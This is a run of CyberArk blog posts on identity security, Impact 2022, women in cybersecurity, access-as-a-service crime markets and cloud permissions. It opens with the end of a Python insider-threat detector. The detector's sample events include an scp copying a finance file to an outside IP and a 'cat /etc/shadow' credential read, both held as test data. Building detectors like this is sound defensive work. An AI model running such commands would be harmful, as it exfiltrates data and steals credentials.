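    Event("alice", 10, "10.0.0.5", "ls -la /srv/finance"),
    Event("alice", 3, "203.0.113.7", "scp /srv/finance/q2.csv user@203.0.113.9:/tmp"),
    Event("bob", 11, "10.0.0.8", "cat /etc/shadow"),
]

if __name__ == "__main__":
    for ev, score, reasons in detect(HISTORY, NEW_EVENTS):
        print(f"ALERT user={ev.user} score={score}: {'; '.join(reasons)}")
```

The point of the reasons list is the "skip ahead" benefit the post describes: an analyst reviewing the alert sees which baseline the event broke and which rule it tripped, rather than scrolling through an entire session recording. A production system would learn baselines continuously and weight deviations statistically instead of with fixed constants.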

It’s time to stop wondering why your organization’s digital identities are doing “stranger things” and how you might respond when they do. Get the real-time identity threat intelligence needed to secure your digital business from cyber attackers coming from the inside, outside or upside down.

At CyberArk, we view continuous identity threat detection and protection as an essential element of an Identity Security program that spans all workforce and privileged users. By embracing a unified approach, organizations can apply intelligent controls that correspond to the risk of a user’s session.

Identity Security Intelligence, our enhanced AI-powered analytics service that provides continuous identity threat detection and protection for workforce and privileged identities, is now generally available as part of the CyberArk Identity Security Platform shared services, enabling CyberArk SaaS customers to holistically protect their workforce and IT users. This service is just one of many enhancements and major additions to the CyberArk Identity Security Platform showcased at CyberArk Impact 2022.


IMPACTful Women in Cybersecurity https://www.cyberark.com/blog/impactful-women-in-cybersecurity/ Mon, 18 Jul 2022 13:00:50 +0000 https://www.cyberark.com/?p=132555

While cybersecurity as an industry aims to close gaps, cybersecurity as a profession has notoriously struggled with its own gaps when it comes to representation. When examining gender diversity specifically, women account for only 25% of the cybersecurity workforce today. This must change.

Bringing more women into the profession, as well as retaining and elevating more women to leadership positions, is essential to addressing widespread talent shortages and driving continued innovation. Unsurprisingly, some of the best ideas on how to make this happen come from women in the field.

At CyberArk Impact 2022, we heard perspectives from an amazing group of female cybersecurity and identity professionals – customers, partners and CyberArk employees – who explored this topic from various angles. We’ve distilled some of the major themes and takeaways here. From paying homage to computer programming’s pioneering females to offering practical ways to better balance life and work, these women truly inspired us last week in Boston.

Breaking Down Barriers to Entry

Sparking interest in technology and cultivating cybersecurity career paths from an early age is one important way to bring more women into the fold. Partnerships with educational institutions and dedicated internship programs drive gender diversity. But not every cyber career follows a straight path. In 2021, the percentage of women leaving the workforce or transitioning to new jobs spiked by 54%, with many searching for more flexibility after shouldering enormous burdens brought on by the pandemic. We must do more to reach these women with a clear message: You don’t have to be technical to have a job in cybersecurity – there are opportunities of all kinds.

And if coding or another technical aspect of cybersecurity does intrigue you, go for it – even if you don’t have a related degree. Yonit Zamir, one of the rockstar software engineers behind our new CyberArk Identity Security Intelligence shared service, said, “I enrolled in a programming course – and haven’t stopped learning since. If you’re interested in development, grow that passion, learn new languages and tools, find opportunities to work on new things, and never give up. Employers will recognize your talent and potential.”

Shaping Modern Technology Innovations

“Women have always played, and continue to play, a critical role in shaping technology innovations,” said Laura Balboni, CyberArk product marketing manager. In fact, many of the first computer programmers were women, from trailblazing mathematician Ada Lovelace to African American females Mary Jackson, Katherine Johnson and Dorothy Vaughan, who overcame institutional racism and sexism to build the U.S. space program at NASA.

Today, as software development centers on exceptional user experience (UX), female engineers continue to bring highly valuable, innate skills to the table, such as intuition, persuasive communication styles and unique problem-solving approaches. Noa Moyal, CyberArk UX/UI group manager, product management, described it this way: “Modern UX, shaped by women, is inclusive yet personalized.”

CyberArk R&D Group Manager Marina Osherov and R&D Project Manager Yael Zigdon shared their perspectives on how women also bring passion and camaraderie to complex projects, building each other up and tackling challenges during late-night calls after the kids go to bed. This dynamic duo led a large, virtual, cross-country team to roll out a new unified admin portal – one of several foundational shared services across the CyberArk Identity Security Platform. “In so many ways, our work styles balance and complement each other, and I’m so grateful for her,” said Osherov of her colleague.

Showing up and Standing up for Women at Work

Fostering inclusion in the workplace is an essential conversation for everyone. We heard from male cybersecurity professionals at the popular “Women in Security” breakfast panel during Impact, who were eager for insights on ways they can improve allyship and become better managers and colleagues. Equality, parity and inclusion were highlighted in responses. Women also encouraged one another to lead by example, take intentional steps to lift others up and use everyday moments to forge connections.

Through mentoring, sponsoring and cheerleading to openly show empathy and support, we can all do something to elevate the women we work with and help them lead.

Recapping: Who Run the World?

We’ll close by summarizing some of our favorite women in cybersecurity soundbites, tips and general sentiments from the industry’s largest gathering of Identity Security leaders:

  • Learn to be comfortable with being uncomfortable. Push others, push yourself.
  • Unapologetically bring your whole self to work each day.
  • Think about where you want to be next year (and the years after that) in your career. And say it out loud!
  • People aspire to be who they can see. Make yourself available and open for organic interactions and connections.
  • On the constant family/work/life juggle: Be purposeful with your time, push to prioritize. You can’t re-do milestone “one time” events like graduations – make them count.
  • And finally, to echo our hands-down favorite CyberArk Impact 2022 keynote walk-in song… “Who Run the World?” (women in cybersecurity).

Have other tips and advice to add to the list? Share them on Twitter with the hashtag #esgcyberark – we’d love to see them and continue this mission-critical conversation.

Live from Impact 2022: Identity Security Trends, Investment and New Innovations https://www.cyberark.com/blog/live-from-impact-2022-identity-security-trends-investment-and-new-innovations/ Wed, 13 Jul 2022 13:22:48 +0000 https://www.cyberark.com/?p=132530

The cybersecurity and identity-focused professionals gathered at CyberArk Impact 2022 need little convincing that Zero Trust is a solid framework to follow. After all, they’re the ones grappling with a daunting identity dilemma: how to keep corporate resources safe and manage growing cybersecurity debt while more than half of workforce identities can access sensitive data, machine identities outnumber human identities 45:1, and any one of these identities can be used to launch an attack chain.

Instead, these dedicated pros have come to Boston (or tuned in virtually) for the Identity Security event of the year to share their stories, hear from fellow experts, and explore innovations that offer a practical path toward that “trust nothing, verify everything” standard.

The Digital World Is Complex — Securing Identities Shouldn’t Be

Many CyberArk customers and partners recognized long ago that protecting the heart of their enterprise meant protecting privileged access. As strategic digitization, remote work, increasing cyber threats, surging compliance and cybersecurity insurance demands, and straight-up necessity began driving sweeping change across their businesses, these forward-looking security leaders were already thinking outside of the box and beyond the crumbling perimeter.

They recognize that securing identities everywhere they exist – in data centers and operational technologies, as well as in hybrid, multi-cloud and SaaS environments – is an ever-growing, multi-faceted challenge that necessitates intelligent privilege controls at the core, along with strong access management and identity management – all encompassed by data analysis and intelligence capabilities. But that doesn’t mean it has to be complicated.

This is what our CyberArk Identity Security vision is all about – using our security-first approach and deep privilege security expertise to make it easier for organizations to secure all human and machine identities accessing all resources from every location. Empowered, they can achieve measurable cyber-risk reduction, accelerate the implementation of Zero Trust frameworks, and meet their strategic business goals.

One Unified Identity Security Platform to Strengthen Cyber Resilience Across Six Key Areas

In today’s opening keynote, CyberArk Founder, Chairman and CEO Udi Mokady and members of the CyberArk executive leadership team outlined specific steps our company has taken over the past year to strengthen existing solutions and introduce new innovations to market that unify Identity Security across six key areas.

1. Workforce and Customer Access: One-quarter of professionals are projected to be fully remote by the end of 2022, and 42% follow a hybrid schedule today. The ability to access corporate resources from anywhere is a given. We’re here to help make authentication for all identities seamless and secure – whether that happens at home, the office, a conference or anywhere else. CyberArk Secure Web Sessions delivers advanced privileged access protection (think IT admin-level security) as employees access — and store their credentials for — sensitive business web and SaaS applications.

2. Endpoint Privilege Security: Our fastest-growing product line reflects heightened awareness and urgency to combat ransomware attacks at the endpoint, with layers of least privilege enforcement, application control, credential theft protection and strong multi-factor authentication for every escalation attempt. In addition to continued solution enhancements, we recently extended endpoint privilege security controls to support Linux – the platform of choice for 83.1% of developers today.

3. Privileged Access Management: Since CyberArk came to be, privileged access management (PAM) has addressed a major security challenge, and building a strong PAM foundation is how many organizations begin their Identity Security journey. We’ve continued to invest heavily in both our Self-Hosted and SaaS-based PAM solutions, and today organizations can comprehensively protect any type of privileged access with CyberArk – including Just-in-Time (JIT) vendor access to SaaS applications and JIT access to ephemeral VMs in cloud environments.

4. Secrets Management: The more organizations digitally transform, the more application secrets exist, and the more critical it becomes to simplify processes and scale protections. Our two new SaaS-based solutions were built for this. The just-announced CyberArk Secrets Hub is an integration with leading cloud-native secrets managers that gives organizations a way to centrally view, control and audit secrets without disrupting the developer experience. This means developers can keep using the cloud-native solutions they prefer, while security managers retain centralized control and can enforce unified policies over secrets using existing processes and infrastructure. (See “CyberArk Launches Secrets Hub for AWS Secrets Manager” for more details).

5. Identity Management: There are millions of identity-related events within any enterprise ecosystem – weeding through all of them (let alone prioritizing and responding to them) is a massive hurdle, and all the while, regulatory and compliance demands are mounting. To help enterprises overcome these challenges, we today introduced CyberArk Identity Flows, a single-pane identity orchestration solution that helps organizations automate identity management tasks and accelerate threat response through no-code app integrations and workflows. We also launched CyberArk Identity Compliance, a new standalone service that automates the access provisioning lifecycle and enforces strong controls – from discovery, to review, to certification – helping IT and security teams satisfy compliance, streamline audits and reduce risk.

6. Cloud Privilege Security: Our Identity Security vision extends to the cloud – an area in which 52% of organizations lack critical identity-centric security controls – and “Cloud Privilege Security” is our term for intelligent controls that help analyze, secure and monitor privileged access to the public cloud. Today, we announced CyberArk Secure Cloud Access, a new service that provisions Just-in-Time, least privilege access to cloud consoles, command lines and services, helping implement Zero Trust initiatives by reducing the risk of compromised privileged sessions and browser hijacking for DevOps and cloud operations teams.

The CyberArk platform is based on a set of foundational shared services, including the new Identity Security Intelligence service that provides continuous identity threat detection and prevention by automatically detecting anomalous user behavior and privileged access misuse for both workforce and privileged users. To learn more about how CyberArk continues to define and advance the Identity Security market, read today’s press releases.

We’re Firing on All Cylinders

The digital world is experiencing landmark changes – and landmark challenges, which are forcing organizations to rethink siloed approaches to privileged access management, access management and identity management. But we can harness these challenges and build a more secure world.

By embracing a unified Identity Security approach centered on intelligent privilege controls, organizations can better defend against their greatest source of risk and support Zero Trust adoption…

By consistently validating all access attempts.

By enforcing least privilege across the enterprise.

And by providing continuous identity threat detection and protection.

“We are firing on all cylinders at CyberArk,” said Mokady this morning. “We are investing heavily in strengthening our existing technologies. We are accelerating with new innovations. And we are just getting started.”

Thank you to all our customers and partners for being with us on this Identity Security journey, and welcome to those who have joined us this week at Impact 2022 as we prepare for cybersecurity’s next era.

For more details, read CyberArk Impact 2022 Delivers Big News and Innovation and That’s a Wrap for CyberArk Impact 2022 on Techspective.

Cyber Attack Commoditization and the Rise of Access-as-a-Service https://www.cyberark.com/blog/cyber-attack-commoditization-and-the-rise-of-access-as-a-service/ Tue, 12 Jul 2022 13:00:13 +0000 https://www.cyberark.com/?p=132493

Despite lingering, dated depictions of dark-hooded figures, cyber crime has matured into a highly professional business sector. With strong backing by organized crime syndicates and nation states, many operations look a lot like any other established business, complete with org charts, marketing teams and HR departments.

As we gear up for CyberArk Impact 2022, we asked Lavi Lazarovitz, senior director of cyber research, CyberArk Labs, to weigh in on the underground industry’s increasing ability to scale and diversify its operations, its rapidly growing managed services economy, and what attack commoditization means for defenders.

Come One, Come All: How Cyber Crime Transformation Has Leveled the Playing Field

Legitimate enterprises across every industry are undergoing major IT transformation initiatives – involving cloud migration, automation, DevOps, hybrid work and more – to become more agile and resilient. A recent EY study found that 84% of organizations are adapting operating models, with many finding their path to transformation through managed services. “Cyber criminal enterprises are no exception, and like many businesses, they’ve been heading toward ‘as a service’ models for some time,” says Lazarovitz.

The meteoric rise in cloud services accelerated this shift. “Cyber attackers gained access to the development tools, infrastructure and other resources needed to scale their approaches,” Lazarovitz explains. Today, the dark web is teeming with darknet marketplaces such as AlphaBay and underground forums like xss[.]is and exploit[.]in, from which threat actors can sell or lease malicious tools and services. And as soon as law enforcement shuts one market down, it seems another one opens or relaunches. “Underground customers with little malware development experience can find virtually anything they need directly off the shelf, paying anonymously with cryptocurrency,” says Lazarovitz.

Ransomware-as-a-Service and Conti’s Lasting Legacy

Ransomware-as-a-service (RaaS) affiliate models – in which sophisticated threat actors typically develop malware, and either sell it as a service and profit off extortions or hire others to do their dirty work – have proven to be particularly lucrative. “Of the ransomware strains observed by CyberArk Labs, two ransomware families, Conti and LockBit, made their way to the top 10 most distributed families, based on the number of variants identified in the wild,” notes Lazarovitz.

The Conti group was a particularly sophisticated and dangerous RaaS operation, known for infiltrating organizations around the globe and weaponizing the Log4j vulnerability. However, geopolitical tensions purportedly drove a wedge between group members, leading to a massive data leak on Twitter in early 2022. The data – analyzed by CyberArk Labs – revealed information about the inner workings of the group, including its common tactics, techniques and procedures (TTPs) as well as source code for malware and tools. Increased scrutiny from law enforcement followed, and the group supposedly shuttered operations in May 2022. However, based on threat intelligence reports, Conti members have started to work closely with their former associate team, TrickBot. And using the leaked Conti “blueprint,” other criminal groups have been able to fast-track development of their own RaaS variants. We’ll explore this in depth during this week’s Impact 2022 session, “Cyber Warfare: What We Can Learn from the Russia-Ukraine Cyber Attacks.”

In upleveling their businesses, organized RaaS groups have also rolled out offerings such as negotiation, payment dispute arbitration and 24/7 help centers for victim organizations. And ransomware groups keep innovating to boost their bottom lines. For instance, last year, Conti ransomware actors started selling access to victims’ networks so other groups could launch follow-on attacks, according to CISA. And triple extortions, a popular REvil technique, are increasing. These groups have proven that cyber crime pays, and as long as the returns exceed the costs, such attacks will continue to increase – especially since almost anyone can get in the game.

The Rise of “Access-as-a-Service” and Its Far-Reaching Implications

“By utilizing RaaS, ransomware operators can focus on leveraging the access they have or have purchased to make more money and impact instead of focusing on writing their own malware,” says Lazarovitz. “And just like anyone can buy a RaaS kit from one of these groups, anyone can go shopping on the dark web for RDP access for as little as $1 to $10.”

Lazarovitz explains that over the past few years, remote access has become a key commodity. Attacks targeting remote employees, third parties and exposed RDP ports are almost constant today. “Remote desktop credentials are frequently used in ransomware campaigns, such as the recent Conti campaigns, for initial access and lateral movement,” he notes. Ninety-seven percent of senior security executives say attackers are increasingly trying to steal one or more types of credentials, which often end up for sale on the dark web, a trend that has driven credential access to the top of the enterprise cyber-risk list.

Lazarovitz explains that cheap, on-demand access to human and machine identities gives attackers of all skill levels numerous opportunities that extend far beyond ransomware. “Access-as-a-service provides a legitimate way to get through the door and gain a foothold within an enterprise,” he says. And the ability to obtain privileged identities without expending much effort is a huge benefit for attackers. “By solving the identity piece of the equation, threat actors can move faster along the attack chain, reach further across supply chains and optimize the operation – making the malware more durable and flexible to run in any environment and reduce its signature, which makes it more difficult to detect,” notes Lazarovitz.

CISOs and security leaders are under enormous pressure to keep pace with this ever-evolving threat landscape – it’s a challenge that no team should face alone. This week at Impact 2022, CyberArk Labs, CyberArk Red Team and other company experts will share a series of research-based presentations and interactive sessions – on everything from how attackers are exploiting identities and risks across the blockchain, to lessons learned from WhisperGate, HermeticWiper and other dangerous malware strains being used in cyber warfare, to new credential attack methods targeting Chromium-based browsers – to help our customers better understand what they’re up against, collaboratively tackle challenges and apply proven Identity Security approaches that reduce risk without compromise.

Explore the full agenda and get ready to make an impact at Impact 2022.


Take Advantage of 10 Technical Community Perks for Identity Security Success https://www.cyberark.com/blog/take-advantage-of-10-technical-community-perks-for-identity-security-success/ Thu, 07 Jul 2022 13:00:52 +0000 https://www.cyberark.com/?p=132445

“There is immense power when a group of people with similar interests gets together to work toward the same goals.” – Idowu Koyenikan

Whether you’re facing a big cybersecurity challenge, evolving a program or simply looking for fast help with a question, there’s nothing more valuable than insights from those who have been in your shoes. That’s why each month, nearly 11,000 CyberArk users visit the CyberArk Technical Community — a one-stop shop for all CyberArk resources and Identity Security-related information sharing and collaboration.

Ahead of CyberArk Impact 2022, we’re highlighting 10 new and enhanced capabilities now available to Community members. If you haven’t already joined, online registration is quick and easy for all current CyberArk customers and partners.

1. Enjoy an enhanced user experience. Our reimagined portal offers a simplified, more powerful experience. Take advantage of the comprehensive search functionality to find anything you need in one click — and view the intuitive dashboard for telemetry data on your environment, such as number of tenants or active users.

2. Browse the expanded knowledge base. Access more than 4,000 articles on a wide variety of topics, security bulletins and how-to videos for common installation and configuration processes. And with at-a-glance access to information, you can ease troubleshooting and fast-track upgrade processes to keep things running smoothly.

3. Get product details at your fingertips. Explore CyberArk Docs, our complete and ever-expanding product documentation library. Inspired by the open-source community, it is completely free and fully accessible to everyone online — no registration required.

4. Join groups based on your specific interests. Join groups based on your specific Identity Security areas of interest and experience, and get notified on the latest news and updates so you’ll never miss a thing.

5. Engage in a friendly competition and showcase your expertise. Ask questions and share responses about product configurations, installations and cybersecurity best practices. By participating, you can earn points and compete for top positions on the leaderboard to showcase your expertise. With more than 14,000 active discussions, there’s something for everyone.

6. Get answers fast. Our expert bench of contributors — which comprises customers, certified partners and CyberArk employees — actively monitors community discussions and provides ready-to-share helpful tips and technical guidance.

7. Follow and vote to help shape future content. By following a discussion or joining a group, you automatically “vote” on that topic, helping us better track and expand content based on community member interest.

8. Submit your requests. Submit and track service requests for customized extension developments or solution upgrades and migrations. Open, edit and follow support cases in one centralized location across the community. You can even share enhancement requests and vote for your favorites. And new CyberArk customers can request encryption keys digitally to streamline onboarding.

9. Tap into world-class training and certification offerings. Access a full range of CyberArk University training and certification options to build the technical skills needed to implement and administer CyberArk Identity Security solutions, set teams up for success, and help your organization get the most out of its CyberArk investments.

10. Directly access the CyberArk Marketplace. Search and download your licensed CyberArk solutions and validated integrations with other security and digital transformation solutions that provide defense in depth and facilitate the shift toward a zero trust model.

Technical Community Feedback

“Many ideas grow better when transplanted into another mind than the one where they sprang up.” – Oliver Wendell Holmes

As you progress along your Identity Security journey, make sure you’re taking full advantage of the resources, expertise and collaborative insights available within the CyberArk Technical Community. Customers and partners can register or stop by today to check out our latest enhancements and take a quick video tour. While you’re exploring, head over to the Welcome Center group to introduce yourself, and let us know what you think by contacting KM@cyberark.com. Your ideas continue to power our community and shape our enhancements, and we welcome them all.


Securing Cloud Environments by Lifting the Veil on Excessive Permissions https://www.cyberark.com/blog/securing-cloud-environments-by-lifting-the-veil-on-excessive-permissions/ Tue, 05 Jul 2022 15:37:19 +0000 https://www.cyberark.com/?p=132273

Have you ever written an email to your boss only to find multiple typos after you’ve sent it, or missed an important work deadline, or hastily clicked on a phishing email? It happens. There’s a saying that “perfect people aren’t real, and real people aren’t perfect.” Despite our best efforts, we all mess up.

The 2022 Verizon Data Breach Investigations Report (DBIR) found that 82% of all breaches involve the human element and 13% stem from human errors – with one error being particularly problematic: cloud service misconfigurations.

Oops, I Misconfigured It Again  

The Verizon DBIR authors write, “The rise of the Misconfiguration error began in 2018 and was largely driven by cloud data store implementations that were stood up without appropriate access controls… Despite the efforts of the major cloud providers to make the default configurations more secure (which we applaud), these errors persist.”

Cloud service misconfigurations persist for two big reasons. First, as we’ve established, people make mistakes. And second, the scale of enterprise cloud environments creates a proliferation of human and machine identities. Each of these digital identities – from cloud admins to roles used for serverless functions – can be configured with tens of thousands of permissions to access cloud services, data and other resources. Based on CyberArk Cloud Entitlements Manager data, there are now more than 28,000 identity and access management (IAM) permissions across AWS, Azure and GCP.

Appropriately scoping these permissions isn’t something most cloud teams are equipped to do. For one, cloud security is a fairly new and evolving discipline, with 70% of IT leaders saying a skills gap in this area is a “critical concern.” Even with the help of technology, it can be difficult for teams to operationalize siloed tools to discover and constantly track who has access to what. There are simply too many interconnected identities to deal with.

Overprovisioning Cloud Permissions: A Quick but Risky Fix

Overprovisioning of cloud IAM permissions – or giving identities more privileges than they need – often becomes the default solution. It’s much easier than trying to identify the proper least privilege access permissions for each identity. And giving broad access to developers and cloud engineering teams helps prevent productivity roadblocks, while also limiting IT tickets (and complaints) from cloud teams requesting access.

But cyber attackers can exploit these unused or unnecessary privileges. Once they compromise a cloud identity, they can leverage excessive permissions to move laterally through the environment or escalate privileges to reach their target. Attackers can create just as much damage by compromising or creating cloud admin accounts with powerful privileges outside of the organization’s existing privileged access management (PAM) program.

Don’t Let These Five Barriers Hold You Back from Taking Control of Your Cloud Estate

Since cloud adoption isn’t slowing down anytime soon, excessive cloud permissions will continue to pile up, contributing to cybersecurity debt and organizational risk. A new category of cloud privilege security solutions is emerging to help teams reduce these risks, including cloud infrastructure entitlements management (CIEM) technologies that harness artificial intelligence (AI) to clean up misconfigured and unused cloud permissions at scale. As teams prioritize cloud privilege security, understanding these common barriers to success can help them avoid issues as they work to take back control:

1. Lack of visibility. Organizations cannot protect what they cannot see. Identity Security becomes more important – and more difficult – as the complexity of a cloud environment grows. Security teams must be able to discover and map all identities, both human and machine, and what resources those identities can access. Intelligent privilege controls, such as monitoring activity logs, can be useful in gaining a deeper understanding of how permissions are being used. But in multi-cloud environments, this visibility cannot scale if it is limited to each individual cloud provider. It must extend across the entirety of the enterprise cloud estate.

2. Lack of granularity. Any identity can become privileged under certain conditions. The ability to monitor and identify unused permissions or misconfigurations, which could result in overprivileged accounts and the creation of shadow admins, is key to enforcing the principle of least privilege. Don’t assume your native cloud identity and access management (IAM) tools cover you on this front, as they typically don’t have the capabilities to get granular.

3. Lack of control. Standardization is the key to Identity Security at scale—yet cloud environments are complex and dynamic, with siloed IAM tooling and rulesets across AWS, Azure and GCP. This creates an inconsistent user experience, which can slow down security teams and impact operational efficiency. It also encourages an ad-hoc approach to security that can result in siloed teams and specialized knowledge of specific platforms. This makes it more difficult to consistently enforce least privilege.

4. Lack of remediation. Identifying overprivileged identities is only part of the challenge. Security teams also need deployable remediations to quickly mitigate risks without disrupting operations. While native IAM tools can identify certain threats, they lack the granular, code-level IAM policy recommendations needed to immediately rectify the issue. Cloud-native IAM tools also lack the capabilities to automatically onboard cloud admin or shadow admin accounts to an organization’s privileged access management solution.

5. Lack of broader risk mitigation. Properly securing all cloud identities from the point of creation is another important consideration, since digital identities are often spun up quickly and frequently with little regard for Identity Security best practices. Equally important is integrating CIEM and existing Identity Security programs to consistently control credentials and access. This consistency is critical to delivering measurable cyber risk reduction.

Manual, disparate methods for securing digital identities will become even more unwieldy as cloud adoption continues and digital identities surge in number. Don’t wait until “human error” simply becomes “humanly impossible.” Instead, take a centralized, intelligent approach that harnesses AI and automation to curb misconfiguration errors and lift the veil on excessive permissions to mitigate risk.
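As an added example (not CyberArk's own code, nor that of Cloud Entitlements Manager), the following Python sketches the analysis the "lack of granularity" and "lack of remediation" points call for: it compares what an IAM policy grants against what activity logs show was actually used, flags wildcard and privilege-granting grants, and emits a narrowed policy. The policy document, the CloudTrail-style event records, the privilege-granting action list and the eventSource/eventName-to-action mapping are all constructed, simplified assumptions.

```python
"""Flag excessive IAM permissions by comparing a policy's granted actions
against the actions actually observed in activity logs, then emit a
narrowed policy. Added example; all inputs below are constructed."""
import fnmatch
import json
from collections import Counter

# Illustrative subset (assumption, not exhaustive) of IAM actions that let an
# identity raise its own or another identity's privilege: a "shadow admin" signal.
PRIVILEGE_GRANTING_ACTIONS = {
    "iam:CreateUser", "iam:AttachUserPolicy", "iam:AttachRolePolicy",
    "iam:PutUserPolicy", "iam:PutRolePolicy", "iam:CreateAccessKey",
    "iam:PassRole", "iam:UpdateAssumeRolePolicy",
}

# Constructed sample: a role policy with a wildcard grant and unused IAM rights
# (the kind of overprovisioning the post describes). Account ID is a placeholder.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*"], "Resource": "*"},
        {"Effect": "Allow",
         "Action": ["iam:PassRole", "iam:CreateUser", "iam:AttachUserPolicy"],
         "Resource": "*"},
        {"Effect": "Allow", "Action": "lambda:InvokeFunction",
         "Resource": "arn:aws:lambda:us-east-1:123456789012:function:report-*"},
    ],
}

# Constructed sample: CloudTrail-style records of what the role did in the lookback window.
SAMPLE_EVENTS = [
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject"},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject"},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBucket"},
]


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _matches(action, pattern):
    """IAM action matching is case-insensitive and '*' is a glob."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def granted_actions(policy):
    """Return (action_pattern, resources) pairs from the policy's Allow statements."""
    grants = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        for action in _as_list(stmt["Action"]):
            grants.append((action, _as_list(stmt.get("Resource", "*"))))
    return grants


def used_actions(events):
    """Count observed actions. Simplified mapping (assumption): the service
    prefix of eventSource plus eventName, e.g. s3.amazonaws.com/GetObject -> s3:GetObject."""
    counts = Counter()
    for ev in events:
        service = ev["eventSource"].split(".")[0]
        counts[f"{service}:{ev['eventName']}"] += 1
    return counts


def analyze(policy, events):
    """Classify each granted action pattern: wildcard, privilege-granting, used or unused."""
    used = used_actions(events)
    report = {"wildcard": [], "privilege_granting": [], "unused": [], "used": {}}
    for pattern, _resources in granted_actions(policy):
        if "*" in pattern:
            report["wildcard"].append(pattern)
        if any(_matches(a, pattern) for a in PRIVILEGE_GRANTING_ACTIONS):
            report["privilege_granting"].append(pattern)
        matched = sorted(a for a in used if _matches(a, pattern))
        if matched:
            report["used"][pattern] = matched
        else:
            report["unused"].append(pattern)
    return report


def least_privilege_policy(policy, events):
    """Rewrite Allow statements to grant only the observed actions, keeping each
    statement's Resource scoping; statements with no observed use are dropped.
    Resource narrowing (replacing '*' with specific ARNs) is a separate step."""
    used = used_actions(events)
    statements = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            statements.append(stmt)  # leave Deny / NotAction statements untouched
            continue
        kept = sorted({a for p in _as_list(stmt["Action"]) for a in used if _matches(a, p)})
        if kept:
            statements.append({**stmt, "Action": kept})
    return {**policy, "Statement": statements}


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_POLICY, SAMPLE_EVENTS), indent=2))
    print(json.dumps(least_privilege_policy(SAMPLE_POLICY, SAMPLE_EVENTS), indent=2))
```

On the sample input the three IAM grants and the Lambda grant are reported as unused, the `s3:*` wildcard is narrowed to the two observed actions, and the IAM grants are additionally flagged as privilege-granting so they can be routed to a PAM onboarding review rather than silently removed.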

Be the first to experience new features and enhancements to the CyberArk Identity Security Platform during CyberArk Impact 2022 on July 12-14, 2022 in Boston. To save your in-person or virtual spot, register today and join us in defining the future of Identity Security.

]]>
Trust, Patient Empowerment and Data: Insights From Takeda’s Chief Digital Trust Officer   https://www.cyberark.com/blog/trust-patient-empowerment-and-data-insights-from-takedas-chief-digital-trust-officer/ Fri, 24 Jun 2022 13:00:38 +0000 https://www.cyberark.com/?p=132132 Takeda’s Chief Digital Trust Officer

It seems logical that the more data a healthcare provider can collect, the better patient treatment will potentially be. But unlike other situations where we’re generally comfortable removing the human element from the equation, such as buying groceries or banking, there is a level of cautiousness about personal health information becoming another digital commodity. How can one be certain that their “digital DNA” is only seen by those with express permission and that it’s only used for good and as intended, such as improving healthcare or driving medical advancements?

Trust is the foundation for almost every facet of our lives, particularly in healthcare. The pandemic further emphasized trust’s central role in interactions between patients and clinicians and across interconnected IT ecosystems – and brought clarity and opportunity to restore eroding trust across the industry.

In a recent episode of our “Trust Issues” podcast, we spoke with Mike Towers, chief digital trust officer at Takeda Pharmaceuticals, about his newly minted role, his vision for the future of healthcare data security and privacy, and how trust is reshaping – and expanding – the traditional CISO role. The following are some of the key takeaways from our conversation.

How CISO Becomes Chief Digital Trust Officer

“The digital trust officer role represents a significant shift that we’re taking as an organization to rewire the entire value chain around digital data and technology and establish trust at every point. It takes on a traditional CISO’s responsibilities — areas such as security operations, identity and access management (IAM), and governance and compliance — and builds upon that foundation. We’re focused on three areas of growth: No. 1 is the data space. We’re enabling the business to be much more data-driven in its decision-making and its operations by focusing on safeguarding data and governance at every point: when it’s captured, shared, extracted and moved,” said Towers.

“The second part is digital engagement: We are widening and broadening the digital reach of our company from an ecosystem perspective to include patients, physicians, payers, government entities and donors. And the third part is what I broadly call ethical analytics, or the process of gathering all this data, and applying algorithms and analytics to that data in a systematic way that considers the moral obligations of protecting and using sensitive data, such as electronic patient healthcare information (ePHI). Ethics is increasingly essential to analytics processes to overcome unintended biases or understand whether or not the analytics you’re applying fit with the original intent and purpose with which the data was captured, as examples,” he continued.

What Makes a Chief Digital Trust Officer?

Every organization is at a different point along its transformation journey, yet most share a common objective: to have a secure, flexible IT infrastructure in place that supports growth. As they rearchitect security to encompass individual identities far beyond traditional network boundaries, CISOs are beginning to embrace the role of chief digital trust officer. This emerging title signals an organization’s commitment to secure digital practices and elevates the CISO as a business enabler. While the role is still evolving at most organizations, the chief digital trust officer often leads the charge in protecting sensitive customer and company data, driving greater transparency across digital interactions and maintaining customer trust.

One of the key requirements, Towers noted, is understanding the business inside and out. “Aspiring leaders should ask themselves, ‘Do I want to be the type of security leader who can be plucked out of my role and put into a completely different industry? Or do I want to know my business deeply so I can evangelize how people, processes and technology can enable a secure digital vision?”

As chief digital trust officer, Towers described two areas he focuses on to strengthen the security and trust connection.

“Getting from security to trust begins with an understanding that the world is much bigger than your company. It requires thinking at the ecosystem scale about who deals with you beyond your employees and contracted consultants,” he explained. “Second is understanding your business value chain: Why do you exist as a company? And what full range of interactions and interconnections are necessary to deliver that value proposition?”

“For instance, in the healthcare industry, what does it mean to get from early-stage drug research to drug development, and then formalize manufacturing and supply chain processes, and then move into payment negotiations with various insurance companies or government entities? Then understanding the challenges of delivering treatments to patients, post-treatment care responsibilities and beyond.”

“In short, it’s about understanding that value chain from a business perspective — and what it will take to strengthen resilience at every point along that chain.”

What Trust Means in the Healthcare Industry

“We’re all patients,” Towers noted, which effectively sums up why trust is so critical in the healthcare field. Each one of us has interacted with a clinician at some point in our lives, placing trust in their ability to deliver care with our best interest at heart. And increasingly, we disclose our deeply personal medical information, trusting that it will stay safe and secure as it travels across expansive networks and inhabits invisible clouds.

When used effectively, technology can continuously validate trust at every interaction point to strengthen data protection and preserve privacy, for instance, authenticating a provider before they can open a medical record or verifying privileged permissions before a virtual care app can access a patient’s diagnostic data.

“Trust is needed to effectively deliver treatment and also, frankly, to instill enough confidence that the treatment you’re getting will be effective and that your data’s taken care of,” said Towers. “Moving forward, we see much more of that trust equation being based on data and digital experiences.”

